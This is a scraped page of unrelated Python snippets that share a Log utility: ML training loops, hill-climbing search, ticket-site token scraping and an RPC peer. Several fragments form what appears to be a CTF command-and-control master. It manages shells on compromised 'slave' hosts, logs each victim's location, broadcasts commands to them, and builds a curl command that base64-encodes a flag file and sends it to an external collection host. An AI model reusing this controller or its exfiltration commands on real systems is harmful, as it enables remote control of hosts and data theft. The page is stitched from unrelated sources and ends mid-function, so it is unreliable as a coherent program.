Пример #1
0
 def prepare_devices(self):
     try:
         self.scanner_service.set_camera_config()
         self.scanner_service.prepare_cams()
     except:
         print("Unexpected error:", sys.exc_info()[0])
         log = Log()
         log.log_error('Error in the method set_new_project_config')
         return {'status': -1}
     return {'status': 1}
Пример #2
0
    def __init__(self,ip='',port=9011,peer_id=-1,build_ui = True, log = None):
        # Node state
        if ip == '':
            self.ip = self._getIP()
        else:
            self.ip = ip
        if not log:
            log = Log('livesession')

        self.id         = peer_id
        self.port       = port
        self.log        = log
        self.name       = '{0}:{1}'.format(self.ip,port)
        self.state      = PeerState(peer_id, self.log)
        self.state.ip   = self.ip
        self.state.port = self.port
        self.state.ips.append(self.state.ip)
        self.state.ports.append(self.state.port)

        # Print start
        log.blue('\n\nINIT', self.id)
        log.blue('-'*(len(self.ip.__str__())+len(self.port.__str__())+3))
        self.log.blue(self.ip, ":", self.port)
        log.blue('-'*(len(self.ip.__str__())+len(self.port.__str__())+3))

        # Init main UI
        if build_ui:
            self.window = MainWindow(self.state)
            self.window.show()
            self.window.raise_()
            self.state.window = self.window
            self.state.newStrokesSignal.connect(self.window.scribbleArea.strokesSignalHandler)

        # Handler for the RPC requests
        self.RPCresponder = RPCresponder(self.state)

        # Accept incoming connections in a background thread
        self.server = SimpleXMLRPCServer((ip,port),logRequests=False,bind_and_activate=False)
        self.server.server_bind()
        self.server.server_activate()
        self.server.register_introspection_functions()
        self.server.register_instance(self.RPCresponder)
        t = Thread(target = self._run,name='{0}:{1}'.format(ip,port))
        t.daemon = True
        t.start()
 def send_command_log(self, command):
     log_file = "./log/%s.log" % (time.strftime("%Y-%m-%d_%H:%M:%S",
                                                time.localtime()))
     Log.info("Log file : %s" % (log_file))
     self.send_command(command)
     time.sleep(0.5)
     Log.info("Receving data from socket...")
     result = recvall(self.socket_fd)
     Log.success(result)
     with open(log_file, "a+") as f:
         f.write("[%s]\n" % ("-" * 0x20))
         f.write("From : %s:%d\n" % (self.hostname, self.port))
         f.write(u"ISP : %s-%s\n" % (self.country, self.isp))
         f.write(u"Location : %s-%s-%s\n" %
                 (self.area, self.region, self.city))
         f.write("Command : %s\n" % (command))
         f.write("%s\n" % (result))
Пример #4
0
 def _get_submit_token(self):
     html = send_requests(LOGIN_SESSION, self.URLS['getExtraInfo'])
     Log.v("获取token中....")
     result = re.findall(r"var globalRepeatSubmitToken = '(.*)'", html)
     ticket_passenger_info = re.findall(r'var ticketInfoForPassengerForm=(.*);', html)
     if result:
         self.token = result[0]
     if ticket_passenger_info:
         try:
             self.ticket_passenger_info = json.loads(ticket_passenger_info[0].replace("'", "\""))
         except TypeError:
             Log.w("获取submit info失败")
             return False
     if self.token and self.ticket_passenger_info:
         Log.v("成功获取token与以及车次信息")
         return True
     else:
         return False
Пример #5
0
def heartbeat_exec_env(exec_env):
    log = Log.get('heartbeat')
    try:
        id = exec_env.meta.id
        lcp = exec_env.lcp
        lbl = f'{id} (LCP at {exec_env.hostname}:{lcp.port})'
        if exec_env.enabled:
            schema = 'https' if lcp.https else 'http'
            endpoint_lcp = '/' + exec_env.lcp.endpoint if exec_env.lcp.endpoint else ''
            resp = post(
                f'{schema}://{exec_env.hostname}:{lcp.port}{endpoint_lcp}/status',
                timeout=Arg_Reader.db.hb_timeout,
                headers={'Authorization': create_token()},
                json={'id': id})
            if resp.status_code == HTTP_Status.OK:
                data = resp.json()
                id = data.pop('id', None)
                lcp.started = data.get('started', None)
                lcp.last_heartbeat = data.get('last_heartbeat', None)
                log.success(f'Connection established with exec-env {lbl}')
            else:
                lcp.last_heartbeat = None
                log.warning(f'Connection reset with exec-env {lbl}')
                log.notice(f'Response: {resp.content}')
            if not lcp.https:
                lcp.https = False
            exec_env.save()
        else:
            log.notice(f'Exec-env {lbl} not enabled')
    except ConnectTimeout:
        log.error(f'Connection timeout with exec-env {lbl}')
    except ConnectionError:
        log.error(f'Connection refused with exec-env {lbl}')
    except Exception as exception:
        log.exception(f'Exception during connection with exec-env {lbl}',
                      exception)
Пример #6
0
 def _validate_jobs(self):
     Log.Instance().appendFinalReport('\nValidating kpis/jobs...\n')
     for job in list(self.loaded_jobs.keys()):
         if self.loaded_jobs[job].action == 'insert' and self.loaded_jobs[
                 job].table_name is None:
             SystemExiter.Instance().exit(
                 'Error: ' + job + ' needs table name to insert data')
     if len(Config.JOBS_NAMES) == 0:
         all_final_jobs = [
             job_name for job_name in list(self.loaded_jobs.keys())
             if self.loaded_jobs[job_name].is_kpi()
         ]
         if Config.RUN_JOBS:
             Config.JOBS_NAMES += [job_name for job_name in all_final_jobs]
     for job_name in Config.JOBS_NAMES:
         if job_name not in self.loaded_jobs:
             if Config.RUN_JOBS:
                 SystemExiter.Instance().exit(
                     'Error: ' + job_name +
                     ' not found in jobs definitions')
             else:
                 SystemExiter.Instance().exit(
                     'Error: ' + job_name +
                     ' not found in jobs definitions ')
Пример #7
0
 def _add_date_field(self, collection):
     results = []
     count_errors = 0
     for item in collection:
         if 'created_at' in item:
             date = item['created_at']
             item['created_at'] = date.strftime("%Y-%m-%d")
         else:
             try:
                 item_date = datetime(int(item['year']), int(item['month']),
                                      int(item['day']))
                 item['created_at'] = item_date.strftime("%Y-%m-%d")
             except KeyError:
                 item['created_at'] = "temp"
             except TypeError:
                 count_errors += 1
                 continue
             except ValueError:
                 count_errors += 1
                 continue
         results.append(item)
     Log.Instance().appendFinalReport(
         "Error parsing created_at field. Count: %s" % (count_errors))
     return results
Пример #8
0
    def update(self, ) -> None:
        update = self._config.update()
        if update:
            if 'prooftrace_search_learning_rate' in update:
                lr = self._config.get('prooftrace_search_learning_rate')
                if lr != self._learning_rate:
                    self._learning_rate = lr
                    for group in self._policy_optimizer.param_groups:
                        group['lr'] = lr
                    for group in self._value_optimizer.param_groups:
                        group['lr'] = lr
                    Log.out("Updated", {
                        "prooftrace_search_learning_rate": lr,
                    })
            if 'prooftrace_search_iota_min_update_count' in update:
                cnt = \
                    self._config.get('prooftrace_search_iota_min_update_count')
                if cnt != self._min_update_count:
                    self._min_update_count = cnt
                    Log.out("Updated", {
                        "prooftrace_search_iota_min_update_count": cnt,
                    })
            if 'prooftrace_search_model_type' in update:
                model_type = self._config.get('prooftrace_search_model_type')
                if model_type != self._type:
                    self._type = model_type
                    Log.out("Updated", {
                        "prooftrace_search_model_type": model_type,
                    })

            if self._tb_writer is not None:
                for k in update:
                    if k in [
                            'prooftrace_search_learning_rate',
                            'prooftrace_search_iota_min_update_count',
                            'prooftrace_search_action_coeff',
                    ]:
                        self._tb_writer.add_scalar(
                            "prooftrace_search_train_run/{}".format(k),
                            update[k],
                            self._epoch,
                        )
Пример #9
0
    def delegate(self, args, **kwargs):
        """
        Executes the command based on the given cli args.

        Parameters
        ----------
        args: Namespace
            The argparse cli arguments
        kwargs: dict
            The arguments to be passed to the handler
        """

        Log.raw_info(self.BANNER)

        Log.info("Checking wine installation")
        if not self.__which("wine"):
            raise ValueError("Unable to continue: wine NOT FOUND")

        Log.info("wine status: OK")
        self.handler(args, kwargs)
def transfer(h):
    slave = slaves[h]
    socket_fd = slave.socket_fd
    buffer_size = 0x400
    interactive_stat = True
    while True:
        if EXIT_FLAG:
            Log.warning("Transfer function exiting...")
            break
        interactive_stat = slave.interactive
        buffer = socket_fd.recv(buffer_size)
        if not buffer:
            Log.error("No data, breaking...")
            break
        sys.stdout.write(buffer)
        if not interactive_stat:
            break
    if interactive_stat:
        Log.error("Unexpected EOF!")
        socket_fd.shutdown(socket.SHUT_RDWR)
        socket_fd.close()
        slave.remove_node()
Пример #11
0
    def test_log(self):

        import re

        #VARIABLES
        log_path = 'c:/temp/utils_log_unittest.log'
        header = 'datetime,host,user,text'
        entry = 'this is a test'
        pattern_entry  = r'([0-9]{4}-[0-9]{2}-[0-9]{2}\s[0-9]{2}:[0-9]{2}:[0-9]{2}.[0-9]{6},' \
                          '[0-9a-zA-Z].*,' \
                          '[0-9a-zA-Z].*,' + entry + ')'
        exp = re.compile(pattern_entry)

        #INSTANTIATE LOG CLASS
        _log = Log(filepath=log_path,
                   autofill=True,
                   printheader=True,
                   headertext=header)

        #WRITE LOG FILE
        _log.write(text=entry)
        _log.write_blank_line()

        #READ IN LOG FILE
        text = [line.strip() for line in open(log_path, 'r').readlines()]

        #TEST HEADER
        self.assertTrue(text[0] == header)

        #TEST LOG ENTRY AGAINST REGEX
        self.assertTrue(len(exp.findall(text[1])) == 1)

        #TEST FOR BLANK LINE (WRITTEN BY write_blank_line() METHOD)
        self.assertTrue(text[2] == '')

        #DELETE THE LOG FILE
        if os.path.exists(log_path): os.remove(log_path)
Пример #12
0
#__author__ = 'pan'
# -*- coding:utf-8 -*-

import os, time
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from utils.log import Log
from utils.readyaml import ReadYaml

#测试报告路径
reportPath = path = os.path.dirname(os.path.dirname(__file__)) + '/report/'
logger = Log()


class SendMail:
    '''定义发送带附件邮件'''
    def __init__(self, mail_config_file):
        config = ReadYaml(mail_config_file).getValue()
        self.sendTo = config['to_address']
        self.sender_name = config['sender_name']
        self.sender_pswd = config['sender_pswd']
        self.host = config['host']
        self.subject = config['subject']

    def __get_report(self):
        '''获得最新测试报告'''
        #获取目录下的所有文件
        lists = os.listdir(reportPath)
        lists.sort()
        new_report_name = lists[-1]
def main():
    if len(sys.argv) != 3:
        print "Usage : "
        print "\tpython master.py [HOST] [PORT]"
        exit(1)

    host = sys.argv[1]
    port = int(sys.argv[2])
    EXEC_LOCAL = True

    signal.signal(signal.SIGINT, signal_handler)
    signal.signal(signal.SIGTERM, signal_handler)

    Log.info("Starting server...")
    master_thread = threading.Thread(target=master, args=(
        host,
        port,
    ))
    Log.info("Connecting to localhost server...")
    slaver_thread = threading.Thread(target=slaver, args=(
        host,
        port,
        True,
    ))
    master_thread.daemon = True
    slaver_thread.daemon = True
    master_thread.start()
    slaver_thread.start()
    time.sleep(1)
    show_commands()
    position = slaves[slaves.keys()[0]].node_hash  # master himself
    while True:
        if len(slaves.keys()) == 0:
            Log.error("No slaves left , exiting...")
            break
        if not position in slaves.keys():
            Log.error("Node is offline... Changing node...")
            position = slaves.keys()[0]
        current_slave = slaves[position]
        context_hint = "[%s:%d] >> " % (current_slave.hostname,
                                        current_slave.port)
        Log.context(context_hint)
        command = raw_input() or "h"
        if command.startswith("#"):
            continue
        if command == "h" or command == "help" or command == "?" or command == "\n":
            show_commands()
        elif command == "l":
            Log.info("Listing online slaves...")
            for key in slaves.keys():
                print "[%s]" % ("-" * 0x2A)
                slaves[key].show_info()
            print "[%s]" % ("-" * 0x2A)
        elif command == "p":
            current_slave.show_info()
        elif command == "c":
            command = raw_input("Input command (uname -r) : ") or ("uname -r")
            Log.info("Command : %s" % (command))
            for i in slaves.keys():
                slave = slaves[i]
                result = slave.send_command_print(command)
        elif command == "g":
            input_node_hash = raw_input(
                "Please input target node hash : ") or position
            Log.info("Input node hash : %s" % (repr(input_node_hash)))
            if input_node_hash == position:
                Log.warning("Position will not change!")
                continue
            found = False
            for key in slaves.keys():
                if key.startswith(input_node_hash):
                    # old_slave = slaves[position]
                    new_slave = slaves[key]
                    # Log.info("Changing position from [%s:%d] to [%s:%d]" % (old_slave.hostname, old_slave.port, new_slave.hostname, new_slave.port))
                    Log.info("Changing position to [%s:%d]" %
                             (new_slave.hostname, new_slave.port))
                    position = key
                    found = True
                    break
            if not found:
                Log.error("Please check your input node hash!")
                Log.error("Position is not changed!")
        elif command == "setl":
            EXEC_LOCAL = True
        elif command == "setr":
            EXEC_LOCAL = False
        elif command == "f*g":
            flag_path = raw_input("Input flag path (/flag.txt) : ") or (
                "/flag.txt")
            box_host = raw_input("Input flag box host (192.168.187.128) : "
                                 ) or ("192.168.187.128")
            box_port = int(raw_input("Input flag box host (80) : ") or ("80"))
            for i in slaves.keys():
                slave = slaves[i]
                command = "FLAG=`cat %s | base64`" % (flag_path)
                Log.info("Command : %s" % (command))
                result = slave.send_command(command)
                command = "curl \"http://%s:%d/?flag=${FLAG}\"" % (box_host,
                                                                   box_port)
                Log.info("Command : %s" % (command))
                result = slave.send_command(command)
                if result:
                    Log.info("Flag is sent to you!")
                else:
                    # slave.remove_node()
                    Log.error(
                        "Executing command failed! Connection aborted! Node removed!"
                    )
                    position = slaves.keys()[0]
                    Log.info("Position changed to : %s" % (position))
        elif command == "fg":
            flag_path = raw_input("Input flag path (/flag.txt) : ") or (
                "/flag.txt")
            box_host = raw_input("Input flag box host (192.168.187.128) : "
                                 ) or ("192.168.187.128")
            box_port = int(raw_input("Input flag box host (80) : ") or ("80"))
            command = "FLAG=`cat %s | base64`" % (flag_path)
            Log.info("Command : %s" % (command))
            result = current_slave.send_command(command)
            command = "curl \"http://%s:%d/?flag=${FLAG}\"" % (box_host,
                                                               box_port)
            Log.info("Command : %s" % (command))
            result = current_slave.send_command(command)
            if result:
                Log.info("Flag is sent to you!")
            else:
                # slave.remove_node()
                Log.error(
                    "Executing command failed! Connection aborted! Node removed!"
                )
                position = slaves.keys()[0]
                Log.info("Position changed to : %s" % (position))
        elif command == "i":
            current_slave.interactive_shell()
        elif command == "q" or command == "quit" or command == "exit":
            EXIT_FLAG = True
            # TODO : release all resources before closing
            Log.info("Releasing resources...")
            for key in slaves.keys():
                slave = slaves[key]
                Log.error("Closing conntion of %s:%d" %
                          (slave.hostname, slave.port))
                slave.socket_fd.shutdown(socket.SHUT_RDWR)
                slave.socket_fd.close()
            Log.error("Exiting...")
            exit(0)
        else:
            Log.error("Unsupported command!")
            if EXEC_LOCAL:
                os.system(command)
            else:
                current_slave.send_command_print(command)
 def remove_node(self):
     Log.error("Removing Node!")
     if self.node_hash in slaves.keys():
         slaves.pop(self.node_hash)
 def send_command_print(self, command):
     self.send_command(command)
     time.sleep(0.125)
     result = recvall(self.socket_fd)
     Log.success(result)
Пример #16
0
def steepest_hill_climbing_tabou(problem,
                                 depart,
                                 args=(math.inf, math.inf),
                                 log=None):
    (max_depl, k) = args

    if log is None:
        log = Log()
    log.write("START Tabou Hill Climbing", 2)
    log.write("MAX_DEPL = %s" % str(max_depl), 3)
    log.write("K = %s" % str(k), 3)
    log.write(problem, 3)

    best = depart
    s = depart
    tmp = None
    tabou = Tabou(k)
    nb_depl = 0
    optimum_found = False
    while not optimum_found and nb_depl < max_depl:
        log.write("step %d :\t %s" % (nb_depl, s.tostr()), 5)
        voisins_non_tabous = [
            x for x in s.get_voisins()
            if x.acceptable() and x.vec not in [y.vec for y in tabou.list]
        ]
        log.write(
            "%d voisins non tabous (taille %d)" %
            (len(voisins_non_tabous), len(tabou.list)), 6)
        if len(voisins_non_tabous) > 0:
            tmp = problem.meilleur_of_sols(voisins_non_tabous)
        else:
            optimum_found = True

        tabou.push_obj(s)

        if tmp.meilleur_que(best):
            best = tmp
            log.write("Nouvel optimum local : %s" % best.tostr(), 4)
        s = tmp
        nb_depl += 1

    log.write("END Tabou Hill Climbing", 2)
    log.write("Tabou : %s" % str(tabou), 3)
    log.write("Depart : %s" % depart.tostr(), 3)
    log.write("Optimum local : %s" % best.tostr(), 3)
    log.write("%d déplacements effectués" % nb_depl, 3)

    return (depart, nb_depl, best, tabou)
Пример #17
0
def steepest_hill_climbing(problem, depart, args=(math.inf), log=None):
    (max_depl) = args

    if log is None:
        log = Log()
    log.write("START Steepest Hill Climbing", 2)
    log.write("MAX_DEPL = %s" % str(max_depl), 3)
    log.write(problem, 3)

    s = depart
    nb_depl = 0
    optimum_found = False
    while nb_depl < max_depl and not optimum_found:
        meilleur_voisin = problem.meilleur_voisin_of_sol(s)
        if meilleur_voisin is not None and meilleur_voisin.meilleur_que(s):
            log.write("step %d :\t %s" % (nb_depl, s.tostr()), 5)
            nb_depl += 1
            s = meilleur_voisin
        else:
            optimum_found = True
    log.write("END Steepest Hill Climbing", 2)
    log.write("Depart : %s" % depart.tostr(), 3)
    log.write("Optimum local : %s" % s.tostr(), 3)
    log.write("Trouvé en %d déplacements" % nb_depl, 3)
    return (depart, nb_depl, s)
Пример #18
0
def steepest_hill_climbing_redemarrage(problem,
                                       methode,
                                       args,
                                       nb_essais=1,
                                       log=None):
    if log is None:
        log = Log()

    log.write("START Redémarrage", 0)
    log.write(problem, 1)
    log.write("%s essais" % str(nb_essais), 1)
    log.write("Methode : %s\n" % str(methode), 1)

    possible_starts = problem.get_random_solutions(nb_essais)
    best = []
    for solution in possible_starts:
        tmp = methode(problem, solution, args, log)
        if best == [] or tmp[2].meilleur_que(best[2]):
            best = tmp
            log.write("Nouvel optimum local : %s" % best[2].tostr(), 1)

    log.write("END Redémarrage", 0)
    log.write("Depart : %s" % best[0].tostr(), 0)
    log.write("Optimum local : %s" % best[2].tostr(), 0)
    log.write("Trouvé en %d déplacements" % best[1], 0)

    return best
Пример #19
0
    def __init__(
        self,
        config: Config,
    ):
        self._config = config

        self._learning_rate = config.get('prooftrace_lm_learning_rate')
        self._min_update_count = \
            config.get('prooftrace_lm_iota_min_update_count')
        self._device = torch.device(config.get('device'))

        self._save_dir = config.get('prooftrace_save_dir')
        self._load_dir = config.get('prooftrace_load_dir')

        self._epoch = 0

        self._tb_writer = None
        if self._config.get('tensorboard_log_dir'):
            self._tb_writer = SummaryWriter(
                self._config.get('tensorboard_log_dir'), )

        self._modules = {
            'E': E(self._config).to(self._device),
            'T': T(self._config).to(self._device),
            'PH': PH(self._config).to(self._device),
            'VH': VH(self._config).to(self._device),
        }

        Log.out(
            "SYN Initializing",
            {
                'parameter_count_E': self._modules['E'].parameters_count(),
                'parameter_count_T': self._modules['T'].parameters_count(),
                'parameter_count_PH': self._modules['PH'].parameters_count(),
                'parameter_count_VH': self._modules['VH'].parameters_count(),
            },
        )

        self._syn = IOTASyn(
            config.get('prooftrace_lm_iota_sync_dir'),
            self._modules,
        )

        self._optimizer = optim.Adam(
            [
                {
                    'params': self._modules['E'].parameters()
                },
                {
                    'params': self._modules['T'].parameters()
                },
                {
                    'params': self._modules['PH'].parameters()
                },
                {
                    'params': self._modules['VH'].parameters()
                },
            ],
            lr=self._learning_rate,
        )

        self._syn.broadcast({'config': self._config})
Пример #20
0
    def run_once(
        self,
        epoch,
    ):
        for it, (act, arg, trh) in enumerate(self._train_loader):
            info = self._ack.fetch(self._device)
            if info is not None:
                self.update(info['config'])
            self._model.train()

            trh_actions, trh_lefts, trh_rights = trh_extract(trh, arg)

            # Because we can't run a pointer network on the full length
            # (memory), we extract indices to focus loss on.
            idx = random.sample(range(self._sequence_length), 64)

            actions = torch.index_select(
                torch.tensor(trh_actions, dtype=torch.int64),
                1,
                torch.tensor(idx, dtype=torch.int64),
            ).to(self._device)
            lefts = torch.index_select(
                torch.tensor(trh_lefts, dtype=torch.int64),
                1,
                torch.tensor(idx, dtype=torch.int64),
            ).to(self._device)
            rights = torch.index_select(
                torch.tensor(trh_rights, dtype=torch.int64),
                1,
                torch.tensor(idx, dtype=torch.int64),
            ).to(self._device)

            prd_actions, prd_lefts, prd_rights = \
                self._model.infer(idx, act, arg)

            act_loss = self._nll_loss(
                prd_actions.view(-1, prd_actions.size(-1)),
                actions.view(-1),
            )
            lft_loss = self._nll_loss(
                prd_lefts.view(-1, prd_lefts.size(-1)),
                lefts.view(-1),
            )
            rgt_loss = self._nll_loss(
                prd_rights.view(-1, prd_rights.size(-1)),
                rights.view(-1),
            )

            # Backward pass.
            for m in self._model.modules():
                self._model.modules()[m].zero_grad()

            (self._action_coeff * act_loss + lft_loss + rgt_loss).backward()

            if self._grad_norm_max > 0.0:
                for m in self._model.modules():
                    torch.nn.utils.clip_grad_norm_(
                        self._model.modules()[m].parameters(),
                        self._grad_norm_max,
                    )

            info = {
                'act_loss': act_loss.item(),
                'lft_loss': lft_loss.item(),
                'rgt_loss': rgt_loss.item(),
            }

            self._ack.push(info, None)

            Log.out(
                "PROOFTRACE LM ACK RUN", {
                    'epoch': epoch,
                    'train_batch': self._train_batch,
                    'act_loss_avg': "{:.4f}".format(act_loss.item()),
                    'lft_loss_avg': "{:.4f}".format(lft_loss.item()),
                    'rgt_loss_avg': "{:.4f}".format(rgt_loss.item()),
                })

            self._train_batch += 1

        Log.out("EPOCH DONE", {
            'epoch': epoch,
        })
Пример #21
0
    def run_once(
        self,
        epoch,
    ):
        act_loss_meter = Meter()
        lft_loss_meter = Meter()
        rgt_loss_meter = Meter()

        with torch.no_grad():
            for it, (act, arg, trh) in enumerate(self._test_loader):
                self._ack.fetch(self._device, blocking=False)
                self._model.eval()

                trh_actions, trh_lefts, trh_rights = trh_extract(trh, arg)

                # Because we can't run a pointer network on the full length
                # (memory), we extract indices to focus loss on.
                idx = random.sample(range(self._sequence_length), 64)

                actions = torch.index_select(
                    torch.tensor(trh_actions, dtype=torch.int64),
                    1,
                    torch.tensor(idx, dtype=torch.int64),
                ).to(self._device)
                lefts = torch.index_select(
                    torch.tensor(trh_lefts, dtype=torch.int64),
                    1,
                    torch.tensor(idx, dtype=torch.int64),
                ).to(self._device)
                rights = torch.index_select(
                    torch.tensor(trh_rights, dtype=torch.int64),
                    1,
                    torch.tensor(idx, dtype=torch.int64),
                ).to(self._device)

                prd_actions, prd_lefts, prd_rights = \
                    self._model.infer(idx, act, arg)

                act_loss = self._nll_loss(
                    prd_actions.view(-1, prd_actions.size(-1)),
                    actions.view(-1),
                )
                lft_loss = self._nll_loss(
                    prd_lefts.view(-1, prd_lefts.size(-1)),
                    lefts.view(-1),
                )
                rgt_loss = self._nll_loss(
                    prd_rights.view(-1, prd_rights.size(-1)),
                    rights.view(-1),
                )

                act_loss_meter.update(act_loss.item())
                lft_loss_meter.update(lft_loss.item())
                rgt_loss_meter.update(rgt_loss.item())

                info = {
                    'test_act_loss': act_loss_meter.avg,
                    'test_lft_loss': lft_loss_meter.avg,
                    'test_rgt_loss': rgt_loss_meter.avg,
                }

                self._ack.push(info, None, True)

                Log.out(
                    "PROOFTRACE LM TST RUN", {
                        'epoch': epoch,
                        'act_loss_avg': "{:.4f}".format(act_loss.item()),
                        'lft_loss_avg': "{:.4f}".format(lft_loss.item()),
                        'rgt_loss_avg': "{:.4f}".format(rgt_loss.item()),
                    })

                self._train_batch += 1

        Log.out("EPOCH DONE", {
            'epoch': epoch,
        })
 def show_info(self):
     Log.info("Hash : %s" % (self.node_hash))
     Log.info("IP : %s" % (self.hostname))
     Log.info("Port : %s" % (self.port))
Пример #23
0
    def run_once(
        self,
        epoch,
    ):
        for m in self._modules:
            self._modules[m].train()

        for it, (idx, act, arg, trh, val) in enumerate(self._train_loader):
            info = self._ack.fetch(self._device)
            if info is not None:
                self.update(info['config'])

            action_embeds = self._modules['E'](act)
            argument_embeds = self._modules['E'](arg)

            hiddens = self._modules['T'](action_embeds, argument_embeds)
            heads = torch.cat(
                [hiddens[i][idx[i]].unsqueeze(0) for i in range(len(idx))],
                dim=0)
            targets = torch.cat(
                [action_embeds[i][0].unsqueeze(0) for i in range(len(idx))],
                dim=0)

            prd_actions, prd_lefts, prd_rights = \
                self._modules['PH'](heads, hiddens, targets)
            prd_values = self._modules['VH'](heads, targets)

            actions = torch.tensor(
                [trh[i].value - len(PREPARE_TOKENS) for i in range(len(trh))],
                dtype=torch.int64).to(self._device)
            lefts = torch.tensor(
                [arg[i].index(trh[i].left) for i in range(len(trh))],
                dtype=torch.int64).to(self._device)
            rights = torch.tensor(
                [arg[i].index(trh[i].right) for i in range(len(trh))],
                dtype=torch.int64).to(self._device)
            values = torch.tensor(val).unsqueeze(1).to(self._device)

            act_loss = self._nll_loss(prd_actions, actions)
            lft_loss = self._nll_loss(prd_lefts, lefts)
            rgt_loss = self._nll_loss(prd_rights, rights)
            val_loss = self._mse_loss(prd_values, values)

            # Backward pass.
            for m in self._modules:
                self._modules[m].zero_grad()

            (self._action_coeff * act_loss + lft_loss + rgt_loss +
             self._value_coeff * val_loss).backward()

            self._ack.push(
                {
                    'act_loss': act_loss.item(),
                    'lft_loss': lft_loss.item(),
                    'rgt_loss': rgt_loss.item(),
                    'val_loss': val_loss.item(),
                }, None)

            Log.out(
                "PROOFTRACE LM ACK RUN", {
                    'epoch': epoch,
                    'train_batch': self._train_batch,
                    'act_loss_avg': "{:.4f}".format(act_loss.item()),
                    'lft_loss_avg': "{:.4f}".format(lft_loss.item()),
                    'rgt_loss_avg': "{:.4f}".format(rgt_loss.item()),
                    'val_loss_avg': "{:.4f}".format(val_loss.item()),
                })

            self._train_batch += 1

        Log.out("EPOCH DONE", {
            'epoch': epoch,
        })
Пример #24
0
    def run_once(self, ):
        for m in self._modules:
            self._modules[m].train()

        run_start = time.time()

        self._optimizer.zero_grad()
        infos = self._syn.reduce(self._device, self._min_update_count)

        if len(infos) == 0:
            time.sleep(1)
            return

        self._optimizer.step()
        self._syn.broadcast({'config': self._config})

        act_loss_meter = Meter()
        lft_loss_meter = Meter()
        rgt_loss_meter = Meter()
        val_loss_meter = Meter()

        for info in infos:
            act_loss_meter.update(info['act_loss'])
            lft_loss_meter.update(info['lft_loss'])
            rgt_loss_meter.update(info['rgt_loss'])
            val_loss_meter.update(info['val_loss'])

        Log.out(
            "PROOFTRACE LM SYN RUN", {
                'epoch': self._epoch,
                'run_time': "{:.2f}".format(time.time() - run_start),
                'update_count': len(infos),
                'act_loss': "{:.4f}".format(act_loss_meter.avg or 0.0),
                'lft_loss': "{:.4f}".format(lft_loss_meter.avg or 0.0),
                'rgt_loss': "{:.4f}".format(rgt_loss_meter.avg or 0.0),
                'val_loss': "{:.4f}".format(val_loss_meter.avg or 0.0),
            })

        if self._tb_writer is not None:
            if act_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_train/act_loss",
                    act_loss_meter.avg,
                    self._epoch,
                )
            if lft_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_train/lft_loss",
                    lft_loss_meter.avg,
                    self._epoch,
                )
            if rgt_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_train/rgt_loss",
                    rgt_loss_meter.avg,
                    self._epoch,
                )
            if val_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_train/val_loss",
                    val_loss_meter.avg,
                    self._epoch,
                )
            self._tb_writer.add_scalar(
                "prooftrace_lm_train/update_count",
                len(infos),
                self._epoch,
            )

        self._epoch += 1

        if self._epoch % 100 == 0:
            self.save()
Пример #25
0
def test():
    parser = argparse.ArgumentParser(description="")

    parser.add_argument(
        'config_path',
        type=str, help="path to the config file",
    )
    parser.add_argument(
        '--dataset_size',
        type=str, help="config override",
    )

    args = parser.parse_args()

    config = Config.from_file(args.config_path)

    if args.dataset_size is not None:
        config.override(
            'prooftrace_dataset_size',
            args.dataset_size,
        )

    with gzip.open(
            os.path.join(
                os.path.expanduser(config.get('prooftrace_dataset_dir')),
                config.get('prooftrace_dataset_size'),
                'traces.tokenizer',
            ), 'rb') as f:
        t = pickle.load(f)

    k = ProofTraceKernel(
        os.path.expanduser(config.get('prooftrace_dataset_dir')),
        config.get('prooftrace_dataset_size'),
    )

    print("==============================")
    print("ProofTrace Fusion testing \\o/")
    print("------------------------------")

    fusion = Fusion(t)

    for i in range(len(k._proofs)):
        step = k._proofs[i]

        thm = None

        if step[0] == 'DEFINITION' or \
                step[0] == 'TYPE_DEFINITION' or \
                step[0] == 'AXIOM':
            thm = Thm(
                i,
                [t.term(hy) for hy in k._theorems[i]['hy']],
                t.term(k._theorems[i]['cc']),
            )

        if step[0] == 'REFL':
            thm = fusion.REFL(t.term(step[1]))

        if step[0] == 'TRANS':
            thm = fusion.TRANS(
                step[1],
                step[2],
            )

        if step[0] == 'MK_COMB':
            thm = fusion.MK_COMB(
                step[1],
                step[2],
            )

        if step[0] == 'ABS':
            thm = fusion.ABS(step[1], t.term(step[2]))

        if step[0] == 'BETA':
            thm = fusion.BETA(t.term(step[1]))

        if step[0] == 'ASSUME':
            thm = fusion.ASSUME(t.term(step[1]))

        if step[0] == 'EQ_MP':
            thm = fusion.EQ_MP(
                step[1],
                step[2],
            )

        if step[0] == 'DEDUCT_ANTISYM_RULE':
            thm = fusion.DEDUCT_ANTISYM_RULE(
                step[1],
                step[2],
            )

        if step[0] == 'INST':
            thm = fusion.INST(
                step[1],
                [[t.term(s[0]), t.term(s[1])] for s in step[2]],
            )

        if step[0] == 'INST_TYPE':
            thm = fusion.INST_TYPE(
                step[1],
                [[t.type(s[0]), t.type(s[1])] for s in step[2]],
            )

        if thm is None:
            Log.out("NOT IMPLEMENTED", {
                'action': step[0],
            })
            return

        # Reinsert the theorem where it belongs in the fusion kernel
        thm._index = i
        fusion.PREMISE(thm)

        org = Thm(
            i,
            [t.term(hy) for hy in k._theorems[i]['hy']],
            t.term(k._theorems[i]['cc']),
        )

        Log.out("STEP", {
            'index': i,
            'rule': step[0],
        })

        if thm.thm_string() != org.thm_string():
            Log.out("DIVERGENCE", {
                'org': org.thm_string(),
            })
            Log.out("DIVERGENCE", {
                'thm': org.thm_string(),
            })
            return
Пример #26
0
#! /usr/bin/env python
# -*- coding:utf-8 -*-

from websocket import create_connection
import sys
import json
from bot import HeartPlayBot
from utils.log import Log

IS_DEBUG = False
IS_SAVE_DATA = False
system_log = Log(IS_DEBUG)


class PokerSocket(object):
    ws = ""

    def __init__(self, player_name, player_number, token, connect_url,
                 poker_bot):
        self.player_name = player_name
        self.connect_url = connect_url
        self.player_number = player_number
        self.poker_bot = poker_bot
        self.token = token

    def takeAction(self, action, data):
        if action == "new_game":
            self.poker_bot.new_game(data)
        # unit : episode
        # init also reset Player
        # init state (init value = 0)
Пример #27
0
    def run_once(self, ):
        for m in self._model.modules():
            self._model.modules()[m].train()

        run_start = time.time()

        self._policy_optimizer.zero_grad()

        infos = self._syn.reduce(self._device, self._min_update_count)

        if len(infos) == 0:
